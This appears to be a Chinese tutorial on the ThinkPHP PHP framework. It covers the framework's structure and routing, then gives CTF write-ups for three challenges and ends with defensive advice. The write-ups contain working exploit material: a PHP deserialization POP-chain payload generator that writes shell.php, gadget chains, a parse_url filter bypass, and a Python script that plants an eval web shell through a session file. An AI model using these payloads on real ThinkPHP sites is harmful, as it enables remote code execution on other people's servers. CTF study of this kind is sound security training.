ThinkPHP框架安全分析与CTF题目解析<\/h1>

一、ThinkPHP基础介绍<\/h2>
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，遵循Apache2开源协议发布。它从Struts结构移植过来并做了改进和完善，同时也借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和MVC模式。<\/p>

MVC模式<\/h3>

Model(模型)<\/strong>: 负责数据逻辑<\/li>
View(视图)<\/strong>: 负责展示<\/li>

Controller(控制器)<\/strong>: 负责业务逻辑<\/li> <\/ul>
TP5.0目录结构<\/h3>
application 应用目录(可设置) ├─common 公共模块目录(可更改) ├─index 前台目录 │ ├─config.php 模块配置文件 │ ├─common.php 模块函数文件 │ ├─controller 控制器目录 │ ├─model 模型目录 │ └─view 视图目录 extend 扩展类库目录(可定义) public WEB部署目录(对外访问目录) ├─static 静态资源存放目录(css,js,image) ├─index.php 应用入口文件 runtime 应用的运行时目录(可写,可设置) \/\/缓存目录 vendor 第三方类库目录(Composer) thinkphp 框架系统目录 ├─lang 语言包目录 ├─library 框架核心类库目录 │ ├─think Think类库包目录 │ └─traits 系统Traits目录 └─tpl 系统模板目录 <\/code><\/pre> 命名空间与自动加载<\/h3> ThinkPHP 5.0中，只需要给类库正确定义所在的命名空间，并且命名空间的路径与类库文件的目录一致，就可以实现类的自动加载。<\/p> 系统内置的根命名空间(类库包):<\/p> think<\/code>: 系统核心类库 (thinkphp\/library\/think)<\/li> traits<\/code>: 系统Trait类库 (thinkphp\/library\/traits)<\/li> app<\/code>: 应用类库 (application)<\/li> <\/ul> URL访问模式<\/h3> 在没有启用路由的情况下，URL访问格式:<\/p> http:\/\/127.0.0.1\/thinkphp\/public\/index.php\/模块\/控制器\/方法 <\/code><\/pre> 二、路径与路由配置<\/h2> 1. 隐藏入口文件<\/h3> 通过.htaccess<\/code>文件配置重写规则:<\/p> <IfModule<\/span> mod_rewrite.c<\/span>><\/span> <\/span><\/span> Options +FollowSymlinks -Multiviews <\/span><\/span> RewriteEngine On<\/span> <\/span><\/span> RewriteCond %{REQUEST_FILENAME} !-d <\/span><\/span> RewriteCond %{REQUEST_FILENAME} !-f <\/span><\/span> RewriteRule ^(.*)$ index.php\/$1 [QSA,PT,L] <\/span><\/span><\/IfModule><\/span> <\/span><\/span><\/code><\/pre>2. 隐藏模块<\/h3> 在public\/index.php<\/code>中加入:<\/p> define<\/span>("BIND_MODULE"<\/span>, "index"<\/span>); <\/span><\/span><\/code><\/pre>这样可以直接访问\/控制器\/方法<\/code>而忽略模块名。<\/p> 3. 路由模式<\/h3> 普通模式<\/strong>: 关闭路由，完全使用PATH_INFO<\/li> 混合模式<\/strong>: 开启路由，并使用路由定义+默认PATH_INFO的方式<\/li> 强制模式<\/strong>: 开启路由，并设置只能使用路由访问<\/li> <\/ul> 配置位于application\/config.php<\/code>:<\/p> \/\/ 是否开启路由 <\/span><\/span><\/span><\/span>'url_route_on'<\/span> =><\/span> true<\/span>, <\/span><\/span>\/\/ 是否强制使用路由 <\/span><\/span><\/span><\/span>'url_route_must'<\/span> =><\/span> false<\/span>, <\/span><\/span><\/code><\/pre>路由注册示例<\/h3> 在application\/route.php<\/code>中:<\/p> use<\/span> think\Route<\/span>; <\/span><\/span>Route<\/span>::<\/span>rule<\/span>('gtfly'<\/span>, 'index\/index\/test'<\/span>); <\/span><\/span><\/code><\/pre>路由规则格式:<\/p> Route<\/span>::<\/span>rule<\/span>('路由表达式'<\/span>,'路由地址'<\/span>,'请求类型'<\/span>,'路由参数(数组)'<\/span>,'变量规则(数组)'<\/span>); <\/span><\/span><\/code><\/pre>简化方法:<\/p> Route<\/span>::<\/span>get<\/span>(); \/\/ 定义GET请求路由规则 <\/span><\/span><\/span><\/span>Route<\/span>::<\/span>post<\/span>(); \/\/ 定义POST请求路由规则 <\/span><\/span><\/span><\/span>Route<\/span>::<\/span>put<\/span>(); \/\/ 定义PUT请求路由规则 <\/span><\/span><\/span><\/span>Route<\/span>::<\/span>delete<\/span>(); \/\/ 定义DELETE请求路由规则 <\/span><\/span><\/span><\/span>Route<\/span>::<\/span>any<\/span>(); \/\/ 所有请求都支持的路由规则 <\/span><\/span><\/span><\/code><\/pre>三、CTF题目分析<\/h2> 1. 强网杯2019 Upload<\/h3> 漏洞分析<\/h4> 上传功能存在文件操作漏洞:<\/p> 上传文件后会将文件以md5(文件名)<\/code>改名<\/li> 后缀拼接.png<\/code><\/li> 使用getimagesize()<\/code>检测文件类型<\/li> 通过filename_tmp<\/code>和filename<\/code>进行文件复制<\/li> <\/ul> <\/li> 存在反序列化漏洞:<\/p> Index.php<\/code>中存在未过滤的反序列化操作<\/li> 可利用Register<\/code>和Profile<\/code>类的魔术方法构造POP链<\/li> <\/ul> <\/li> <\/ol> 利用链构造<\/h4> __destruct<\/span>() -><\/span> __call<\/span>() -><\/span> __get<\/span>() -><\/span> 任意函数调用<\/span> <\/span><\/span><\/code><\/pre>利用步骤<\/h4> 上传图片马<\/li> 构造反序列化payload:<\/li> <\/ol> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> app\web\controller<\/span>; <\/span><\/span> <\/span><\/span>class<\/span> Profile<\/span> { <\/span><\/span> public<\/span> $checker =<\/span> 0<\/span>; <\/span><\/span> public<\/span> $filename_tmp =<\/span> '\/var\/www\/html\/public\/upload\/...\/1.png'<\/span>; <\/span><\/span> public<\/span> $filename =<\/span> '\/var\/www\/html\/public\/upload\/...\/shell.php'<\/span>; <\/span><\/span> public<\/span> $upload_menu; <\/span><\/span> public<\/span> $ext =<\/span> 1<\/span>; <\/span><\/span> public<\/span> $img; <\/span><\/span> public<\/span> $except =<\/span> ['index'<\/span> =><\/span> 'upload_img'<\/span>]; <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> app\web\controller<\/span>; <\/span><\/span> <\/span><\/span>class<\/span> Register<\/span> { <\/span><\/span> public<\/span> $checker; <\/span><\/span> public<\/span> $registed =<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>$a =<\/span> new<\/span> Register<\/span>(); <\/span><\/span>$b =<\/span> new<\/span> Profile<\/span>(); <\/span><\/span>$a-><\/span>checker<\/span> =<\/span> $b; <\/span><\/span>echo<\/span> base64_encode<\/span>(serialize<\/span>($a)); <\/span><\/span><\/code><\/pre> 将生成的payload作为cookie提交<\/li> 访问生成的shell.php<\/li> <\/ol> 2. 安洵杯2019 iamthinking<\/h3> 漏洞分析<\/h4> 存在反序列化入口: $paylaod =<\/span> @<\/span>$_GET['payload'<\/span>]; <\/span><\/span>unserialize<\/span>($paylaod); <\/span><\/span><\/code><\/pre><\/li> 存在过滤: if<\/span> (preg_match<\/span>("\/^O\/i"<\/span>, $value)) { <\/span><\/span> die<\/span>('STOP HACKING'<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>可通过parse_url<\/code>绕过: \/\/ 在host后面添加两个斜线可使parse_url失效 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 利用链1<\/h4> __destruct<\/span>() -><\/span> save<\/span>() -><\/span> updateData<\/span>() -><\/span> checkAllowFields<\/span>() -><\/span> __toString<\/span>() -><\/span> toJson<\/span>() -><\/span> toArray<\/span>() -><\/span> getAttr<\/span>() -><\/span> getValue<\/span>() <\/span><\/span><\/code><\/pre>关键点:<\/p> 利用Model<\/code>类的__destruct<\/code>方法<\/li> 通过getValue<\/code>中的$closure<\/code>执行系统命令<\/li> <\/ol> 利用链2<\/h4> 参考ThinkPHP6.0的反序列化漏洞，与"2020新春红包题"类似。<\/p> 3. GYCTF2020 EasyThinking<\/h3> 漏洞分析<\/h4> ThinkPHP6.0存在session写文件漏洞<\/li> session后缀可控，可写入.php<\/code>文件<\/li> 关键代码: if<\/span> (!<\/span>session<\/span>('?UID'<\/span>)){ <\/span><\/span> return<\/span> redirect<\/span>('\/home\/member\/login'<\/span>); <\/span><\/span>} <\/span><\/span>$data =<\/span> input<\/span>("post."<\/span>); <\/span><\/span>$record =<\/span> session<\/span>("Record"<\/span>); <\/span><\/span>if<\/span> (!<\/span>session<\/span>("Record"<\/span>)){ <\/span><\/span> session<\/span>("Record"<\/span>,$data["key"<\/span>]); <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 利用步骤<\/h4> 正常注册账号<\/li> 登录时设置.php<\/code>结尾的session ID<\/li> 向home\/member\/search<\/code> POST一句话<\/li> 访问\/runtime\/session\/<\/code>下的PHP文件<\/li> <\/ol> 利用代码<\/h4> import<\/span> requests <\/span><\/span> <\/span><\/span>url_reg =<\/span> 'http:\/\/xxx\/home\/member\/register'<\/span> <\/span><\/span>url_log =<\/span> 'http:\/\/xxx\/home\/member\/login'<\/span> <\/span><\/span>url_sea =<\/span> 'http:\/\/xxx\/home\/member\/search'<\/span> <\/span><\/span> <\/span><\/span>headers =<\/span> {'Cookie'<\/span>: 'PHPSESSID=1234567890123456789012345678.php'<\/span>} <\/span><\/span>data1 =<\/span> {'username'<\/span>: 'gtfly'<\/span>, 'password'<\/span>: '123456'<\/span>} <\/span><\/span>data2 =<\/span> {'key'<\/span>: '<?php @eval($_POST["t"]);echo "not flag"; ?>'<\/span>} <\/span><\/span> <\/span><\/span>s1 =<\/span> requests.<\/span>post(url_reg, data1) <\/span><\/span>s2 =<\/span> requests.<\/span>post(url_log, data1, headers=<\/span>headers) <\/span><\/span>s3 =<\/span> requests.<\/span>post(url_sea, data2, headers=<\/span>headers) <\/span><\/span> <\/span><\/span>test =<\/span> 'http:\/\/xxx\/runtime\/session\/sess_1234567890123456789012345678.php'<\/span> <\/span><\/span>s =<\/span> requests.<\/span>get(test).<\/span>text <\/span><\/span>if<\/span> 'not flag'<\/span> in<\/span> s: <\/span><\/span> print('success'<\/span>) <\/span><\/span>else<\/span>: <\/span><\/span> print('failed'<\/span>) <\/span><\/span><\/code><\/pre>四、防御建议<\/h2> 对用户输入进行严格过滤<\/li> 避免直接反序列化用户输入<\/li> 及时更新框架版本<\/li> 限制文件上传类型和后缀<\/li> 配置安全的session处理机制<\/li> 禁用危险函数<\/li> <\/ol> 五、参考链接<\/h2> https:\/\/xz.aliyun.com\/t\/6924#toc-9<\/li> https:\/\/xz.aliyun.com\/t\/7131<\/li> <\/ol>